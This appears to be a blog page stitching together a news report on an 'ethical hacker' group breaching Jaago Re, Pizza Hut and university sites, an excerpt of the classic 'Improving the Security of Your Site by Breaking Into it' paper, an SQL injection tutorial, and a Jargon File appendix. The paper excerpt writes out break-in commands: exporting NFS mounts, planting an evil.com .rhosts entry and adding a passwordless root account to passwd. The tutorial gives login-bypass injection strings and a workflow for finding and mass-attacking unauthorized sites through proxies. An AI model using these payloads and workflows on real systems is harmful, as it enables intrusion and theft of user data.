Jaago Re and Pizza Hut Hacked by A group of ethical hackers

Jaago Re and Pizza Hut Hacked by A group of ethical hackers

How many times have you registered on a website and, to keep things simple, entered the same password you use for your email ID? Here’s a warning, every time you do that, you become vulnerable to hackers who, by breaking into the security systems of websites, have access to all your personal emails and sensitive information such as photos, account numbers, bank passwords etc.
   A two-year-old registered group of ethical hackers, who run a nonprofit organisation called Information Security Awareness Community Movement (ISACM) have discovered that some of the most frequented websites in the country — Jaago Re, IIT Bombay, Pizza Hut and Mumbai University — have very poor security systems. Last week, they managed to procure email IDs and passwords of eight lakh users from two sites alone.

In the case of jaagore.com, which conducted an intensive campaign before the Lok Sabha polls, ISCAM officials said they were able to get email IDs and passwords of 6.4 lakh registered users, including some prominent people in the country.
P G Krishnamurthy, ISACM’s principal consultant, said that on this site, sensitive information such as people’s electoral numbers etc is also accessible to anyone who wants to misuse it.
   Krishnamurthy explained that the first time they found vulnerabilities in jaagore.com earlier this year, they were immediately able to see the chinks in the armour. Once the group alerted the site owners, passwords were encrypted but the overall security was still low.
   Once again on September 2, they
compromised the site and were able to access mail IDs and passwords with only a little more effort than earlier. “We have once again notified the owners that they need to upgrade the security,” said Krishnamurthy.

With Pizza Hut, the hackers were able to access data of 1.7 lakh registered users. They claim that it is possible to take complete control of the site. With IIT Bombay and Mumbai University, the story is not very different.

   “In the case of Mumbai University, we could simply tinker with the information. Even the results section was open to us. As for IIT Bombay, we had complete control of the website,” said Krishnamurthy.

Krishnamurthy said, “As ethical hackers, our objective is not to misuse any information but merely test the security of the sites. Once we find a vulnerable website, we let the owners and concerned cyber cell authorities know that security can easily be breached.” The group even volunteers to help the owners fix the problems free of cost.

   “Our goal is to warn Indian site owners that it is about time they take security seriously,” he added. ISACM has written to the owners of the four sites warning them of the security problems. “We haven’t heard from any one yet. However, we are sure the owners will act on our information,”he said.

Tata Tea, owners of jaagore.com, accepted that their site had been vulnerable earlier. “The current security levels of jaagore.com are on par with international standards for a website of its nature. The company is confident that the current security levels of jaagore.com will not allow any form of unauthorised access and is sufficient to safeguard the interests of the website and also the privacy of all its registered users,”

   stated an emailed statement issued by Tata Tea.

Initially, Professor Abhay Karandikar, head of computer centre at IIT Bombay, denied that the site had been hacked. “My proxy logs do not see any breach at all. I keep receiving fake threats and send them to the cyber crime cell for action,” he said. However, he later added that he would get in touch with ISACM to ascertain whether they had
managed to breach the site and how they had done it.

Pizza Hut officials too denied that their site had been compromised. “Pizza Hut deploys the highest standards of IT security across its systems, especially where customer data is concerned. This matter has been recently brought to our notice and we have found no signs of any breach. However, as a responsible company we are checking our security systems again and will take appropriate action if warranted,” said a spokesperson of Pizza Hut.

Mumbai University too stated that it would take all the necessary steps to secure the site. “Thanks a lot for cautioning us. The university will take immediate steps to avoid any further damage,” said K Venkatramani, registrar of Mumbai University.

Seventy per cent of Internet users use passwords of their email IDs while registering on various websites. By getting into one email inbox, hackers can gain access to the entire virtual life of an individual and other IDs as well












Source: Pune Mirror

Improving the Security of Your Site by Breaking Into it

Introduction———— Every day, all over the world, computer networks and hosts are beingbroken into. The level of sophistication of these attacks varieswidely; while it is generally believed that most break-ins succeed dueto weak passwords, ther…



Every day, all over the world, computer networks and hosts are being

broken into. The level of sophistication of these attacks varies

widely; while it is generally believed that most break-ins succeed due

to weak passwords, there are still a large number of intrusions that use

more advanced techniques to break in. Less is known about the latter

types of break-ins, because by their very nature they are much harder to



CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley .

Purdue. Sun. You name it, we’ve seen it broken into. Anything that is

on the Internet (and many that isn’t) seems to be fairly easy game. Are

these targets unusual? What happened?

Fade to…

A young boy, with greasy blonde hair, sitting in a dark room. The room

is illuminated only by the luminescense of the C64’s 40 character

screen. Taking another long drag from his Benson and Hedges cigarette,

the weary system cracker telnets to the next faceless “.mil” site on his

hit list. “guest — guest”, “root — root”, and “system — manager” all

fail. No matter. He has all night… he pencils the host off of his

list, and tiredly types in the next potential victim…

This seems to be the popular image of a system cracker. Young,

inexperienced, and possessing vast quantities of time to waste, to get

into just one more system. However, there is a far more dangerous type

of system cracker out there. One who knows the ins and outs of the

latest security auditing and cracking tools, who can modify them for

specific attacks, and who can write his/her own programs. One who not

only reads about the latest security holes, but also personally

discovers bugs and vulnerabilities. A deadly creature that can both

strike poisonously and hide its tracks without a whisper or hint of a

trail. The uebercracker is here.


Why “uebercracker”? The idea is stolen, obviously, from Nietzsche’s

uebermensch, or, literally translated into English, “over man.”

Nietzsche used the term not to refer to a comic book superman, but

instead a man who had gone beyond the incompetence, pettiness, and

weakness of the everyday man. The uebercracker is therefore the system

cracker who has gone beyond simple cookbook methods of breaking into

systems. An uebercracker is not usually motivated to perform random

acts of violence. Targets are not arbitrary — there is a purpose,

whether it be personal monetary gain, a hit and run raid for

information, or a challenge to strike a major or prestigious site or

net.personality. An uebercracker is hard to detect, harder to stop, and

hardest to keep out of your site for good.



In this paper we will take an unusual approach to system security.

Instead of merely saying that something is a problem, we will look

through the eyes of a potential intruder, and show _why_ it is one. We

will illustrate that even seemingly harmless network services can become

valuable tools in the search for weak points of a system, even when

these services are operating exactly as they are intended to.

In an effort to shed some light on how more advanced intrusions occur,

this paper outlines various mechanisms that crackers have actually used

to obtain access to systems and, in addition, some techniques we either

suspect intruders of using, or that we have used ourselves in tests or

in friendly/authorized environments.

Our motivation for writing this paper is that system administrators are

often unaware of the dangers presented by anything beyond the most

trivial attacks. While it is widely known that the proper level of

protection depends on what has to be protected, many sites appear to

lack the resources to assess what level of host and network security is

adequate. By showing what intruders can do to gain access to a remote

site, we are trying to help system administrators to make _informed_

decisions on how to secure their site — or not. We will limit the

discussion to techniques that can give a remote intruder access to a

(possibly non-interactive) shell process on a UNIX host. Once this is

achieved, the details of obtaining root privilege are beyond the scope

of this work — we consider them too site-dependent and, in many cases,

too trivial to merit much discussion.

We want to stress that we will not merely run down a list of bugs or

security holes — there will always be new ones for a potential attacker

to exploit. The purpose of this paper is to try to get the reader to

look at her or his system in a new way — one that will hopefully afford

him or her the opportunity to _understand_ how their system can be

compromised, and how.

We would also like to reiterate to the reader that the purpose of this

paper is to show you how to test the security of your own site, not how

to break into other people’s systems. The intrusion techniques we

illustrate here will often leave traces in your system auditing logs —

it might be constructive to examine them after trying some of these

attacks out, to see what a real attack might look like. Certainly other

sites and system administrators will take a very dim view of your

activities if you decide to use their hosts for security testing without

advance authorization; indeed, it is quite possible that legal action

may be pursued against you if they perceive it as an attack.

There are four main parts to the paper. The first part is the

introduction and overview. The second part attempts to give the reader

a feel for what it is like to be an intruder and how to go from knowing

nothing about a system to compromising its security. This section goes

over actual techniques to gain information and entrance and covers basic

strategies such as exploiting trust and abusing improperly configured

basic network services (ftp, mail, tftp, etc.) It also discusses

slightly more advanced topics, such as NIS and NFS, as well as various

common bugs and configuration problems that are somewhat more OS or

system specific. Defensive strategies against each of the various

attacks are also covered here.

The third section deals with trust: how the security of one system

depends on the integrity of other systems. Trust is the most complex

subject in this paper, and for the sake of brevity we will limit the

discussion to clients in disguise.

The fourth section covers the basic steps that a system administrator

may take to protect her or his system. Most of the methods presented

here are merely common sense, but they are often ignored in practice —

one of our goals is to show just how dangerous it can be to ignore basic

security practices.

Case studies, pointers to security-related information, and software are

described in the appendices at the end of the paper.

While exploring the methods and strategies discussed in this paper we we

wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in

shell, perl, expect and C, it examines a remote host or set of hosts and

gathers as much information as possible by remotely probing NIS, finger,

NFS, ftp and tftp, rexd, and other services. This information includes

the presence of various network information services as well as

potential security flaws — usually in the form of incorrectly setup or

configured network services, well-known bugs in system or network

utilities, or poor or ignorant policy decisions. It then can either

report on this data or use an expert system to further investigate any

potential security problems. While SATAN doesn’t use all of the methods

that we discuss in the paper, it has succeeded with ominous regularity

in finding serious holes in the security of Internet sites. It will be

posted and made available via anonymous ftp when completed; Appendix A

covers its salient features.

Note that it isn’t possible to cover all possible methods of breaking

into systems in a single paper. Indeed, we won’t cover two of the most

effective methods of breaking into hosts: social engineering and

password cracking. The latter method is so effective, however, that

several of the strategies presented here are geared towards acquiring

password files. In addition, while windowing systems (X, OpenWindows,

etc.) can provide a fertile ground for exploitation, we simply don’t

know many methods that are used to break into remote systems. Many

system crackers use non-bitmapped terminals which can prevent them from

using some of the more interesting methods to exploit windowing systems

effectively (although being able to monitor the victim’s keyboard is

often sufficient to capture passwords). Finally, while worms, viruses,

trojan horses, and other malware are very interesting, they are not

common (on UNIX systems) and probably will use similar techniques to the

ones we describe in this paper as individual parts to their attack


Gaining Information


Let us assume that you are the head system administrator of Victim

Incorporated’s network of UNIX workstations. In an effort to secure

your machines, you ask a friendly system administrator from a nearby

site (evil.com) to give you an account on one of her machines so that

you can look at your own system’s security from the outside.

What should you do? First, try to gather information about your

(target) host. There is a wealth of network services to look at:

finger, showmount, and rpcinfo are good starting points. But don’t stop

there — you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,

and as many other services as you can find. There are so many methods

and techniques that space precludes us from showing all of them, but we

will try to show a cross-section of the most common and/or dangerous

strategies that we have seen or have thought of. Ideally, you would

gather such information about all hosts on the subnet or area of attack

— information is power — but for now we’ll examine only our intended


To start out, you look at what the ubiquitous finger command shows you

(assume it is 6pm, Nov 6, 1993):

victim % finger @victim.com


Login Name TTY Idle When Where

zen Dr. Fubar co 1d Wed 08:00 death.com

Good! A single idle user — it is likely that no one will notice if you

actually manage to break in.

Now you try more tactics. As every finger devotee knows, fingering “@”,

“0”, and “”, as well as common names, such as root, bin, ftp, system,

guest, demo, manager, etc., can reveal interesting information. What

that information is depends on the version of finger that your target is

running, but the most notable are account names, along with their home

directories and the host that they last logged in from.

To add to this information, you can use rusers (in particular with the

-l flag) to get useful information on logged-in users.

Trying these commands on victim.com reveals the following information,

presented in a compressed tabular form to save space:

Login Home-dir Shell Last login, from where

—– ——– —– ———————-

root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com

bin /bin Never logged in

nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co

daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com

sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com

zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com

sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com

guest /export/foo /bin/sh Never logged in

ftp /home/ftp Never logged in

Both our experiments with SATAN and watching system crackers at work

have proved to us that finger is one of the most dangerous services,

because it is so useful for investigating a potential target. However,

much of this information is useful only when used in conjunction with

other data.

For instance, running showmount on your target reveals:

evil % showmount -e victim.com

export list for victim.com:

/export (everyone)

/var (everyone)

/usr easy

/export/exec/kvm/sun4c.sunos.4.1.3 easy

/export/root/easy easy

/export/swap/easy easy

Note that /export/foo is exported to the world; also note that this is

user guest’s home directory. Time for your first break-in! In this

case, you’ll mount the home directory of user “guest.” Since you don’t

have a corresponding account on the local machine and since root cannot

modify files on an NFS mounted filesystem, you create a “guest” account

in your local password file. As user guest you can put an .rhosts entry

in the remote guest home directory, which will allow you to login to the

target machine without having to supply a password.

evil # mount victim.com:/export/foo /foo

evil # cd /foo

evil # ls -lag

total 3

1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .

1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..

1 drwx–x–x 9 10001 daemon 1024 Aug 3 15:49 guest

evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd

evil # ls -lag

total 3

1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .

1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..

1 drwx–x–x 9 guest daemon 1024 Aug 3 15:49 guest

evil # su guest

evil % echo evil.com >> guest/.rhosts

evil % rlogin victim.com

Welcome to victim.com!

victim %

If, instead of home directories, victim.com were exporting filesystems

with user commands (say, /usr or /usr/local/bin), you could replace a

command with a trojan horse that executes any command of your choice.

The next user to execute that command would execute your program.

We suggest that filesystems be exported:

o Read/write only to specific, trusted clients.

o Read-only, where possible (data or programs can often be

exported in this manner.)

If the target has a “+” wildcard in its /etc/hosts.equiv (the default in

various vendor’s machines) or has the netgroups bug (CERT advisory

91:12), any non-root user with a login name in the target’s password

file can rlogin to the target without a password. And since the user

“bin” often owns key files and directories, your next attack is to try

to log in to the target host and modify the password file to let you

have root access:

evil % whoami


evil % rsh victim.com csh -i

Warning: no access to tty; thus no job control in this shell…

victim % ls -ldg /etc

drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc

victim % cd /etc

victim % mv passwd pw.old

victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd

victim % ^D

evil % rlogin victim.com -l toor

Welcome to victim.com!

victim #

A few notes about the method used above; “rsh victim.com

SQL injection Basic Tutorial

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.this tutorial is not going to go into detail on why these string work SEARCH:admin\login.asplogin.aspwith these two search string you will have plen…

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work



with these two search string you will have plenty of targets to chose from…finding one thats vulnerable is another question


first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs…legally cool…provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org “thanks mate” .. gives me a chance to concentrate on what am doing and not be looking over my shoulder


this is the easiest part…very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–


user:’ or 1=1–
admin:’ or 1=1–

some sites will have just a password so

password:’ or 1=1–

infact i have compiled a combo list with strings like this to use on my chosen targets ….there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths…but thats another paper

the one am interested in are quick access to targets


i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:’ or a=a–
admin:’ or 1=1–

and so on…it dont have to be admin can be anything you want… the most important part is example:’ or 1=1– this is our injection

now the only trudge part is finding targets to exploit…so i tend to search say google for login.asp or whatever

index of:/admin/login.asp

like this: index of login.asp



17,000 possible targets trying various searches spews out plent more

now using proxys set in my browser i then click through interesting targets…seeing whats what on the site pages if interesting
i then cut and paste url as a possible target…after an hour or so you have a list of sites of potential targets like so


and so on…in a couple of hours you can build up quite a list…reason i dont sellect all results or spider for login pages is
i want to keep the noise level low…my ISP.. well enough said…plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list…start..now i dont want to go into
problems with users using Ares..thing is i know it works for me…

sit back and wait…any target vulnerable with show up in the hits box…now when it finds a target it will spew all the strings on that site as vulnerable…you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site …really i need a program that will return the hit with a click on url and ignore false outputs

am still looking….thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process



‘ or 0=0 —

” or 0=0 —

or 0=0 —

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 —

hi’ or 1=1 —

hi’ or ‘a’=’a

hi’) or (‘a’=’a

hi”) or (“a”=”a

happy hunting


WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions…do the right thing and let admins know ay


Helping Hacker Culture Grow

If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:* If you are a writer or journalist, don’t say or write hacker when you mean cracker. If you work with writers or journalists,…

If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:

* If you are a writer or journalist, don’t say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the work `hacker’, write them and straigten them out (this appendix includes a model letter).

* If you’re a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution’ that costs more than it’s worth, be ready to blow the competition away with free software running over i free Unix.

* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at [email protected], by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.

* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers’ faces, preventing them from developing innovative software for tomorrow’s needs. You can reach the League for Programming Freedom at [email protected] by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.

* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act’ had just been declared “unconstitutional on its face” by a Federal court, but the government is expected to appeal. If it’s still law when you read this, please join the effort by the Citizens’ Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and technology’s home page at http://www.cdt.org to see what you can do to help fight censorship of the net.

Here’s the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using “hacker” only in a pejorative sense. We hear that most major newspapers have the same policy. If you’d like to help change this situation, send your favorite newspaper the same letter — or, better yet, write your own letter.

Dear Editor:

This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.

I am a hacker. That is to say, I enjoy playing with computers — working with, learning about, and writing clever computer programs. I am not a cracker; I don’t make a practice of breaking computer security.

There’s nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I’m admitting something naughty — because newspapers such as yours misuse the word “hacker”, giving the impression that it means “security breaker” and nothing else. You are giving hackers a bad name.

The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between “hacker” and “security breaker”. They know how to make the distinction, but you don’t let them! You insist on using “hacker” pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.

Of course, you have a reason. You say that readers have become used to your insulting usage of “hacker”, so that you cannot change it now. Well, you can’t undo past mistakes today; but that is no excuse to repeat them tomorrow.

If I were what you call a “hacker”, at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don’t do that kind of thing! I have enough computers to play with at home and at work; I don’t need yours. Besides, it’s not my way to respond to insults with violence. My response is this letter.

You owe hackers an apology; but more than that, you owe us ordinary respect.

Sincerely, etc.

some links